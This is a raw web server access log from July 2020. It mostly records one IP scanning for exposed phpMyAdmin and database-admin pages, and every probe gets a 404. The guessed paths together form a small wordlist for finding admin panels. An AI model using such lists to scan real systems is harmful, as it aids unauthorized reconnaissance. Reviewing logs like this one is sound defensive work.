118.24.22.175 - - [02/Jul/2020:21:36:21 +0200] "GET /phpmadmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:22 +0200] "GET /321/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:23 +0200] "GET /123131/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:23 +0200] "GET /phpMyAdminn/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
83.97.20.21 - - [02/Jul/2020:21:36:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
118.24.22.175 - - [02/Jul/2020:21:36:24 +0200] "GET /phpMyAdminhf/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:25 +0200] "GET /sbb/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [02/Jul/2020:21:36:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
218.161.106.20 - - [02/Jul/2020:21:36:37 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
122.117.15.36 - - [02/Jul/2020:21:37:28 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:37:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:37:45 +0200] "GET /WWW/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:51 +0200] "GET /phpMyAdmln/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:51 +0200] "GET /phpMyAdmin_ai/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:52 +0200] "GET /__phpMyAdmin/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:52 +0200] "GET /program/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:53 +0200] "GET /shopdb/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:53 +0200] "GET /phppma/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:54 +0200] "GET /phpmy/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:55 +0200] "GET /mysql/admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:55 +0200] "GET /mysql/dbadmin/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:56 +0200] "GET /mysql/sqlmanager/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:37:57 +0200] "GET /mysql/mysqlmanager/index.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:38:00 +0200] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 364 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:38:00 +0200] "GET /sqladmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:38:01 +0200] "GET /sql/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:38:02 +0200] "GET /SQL/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
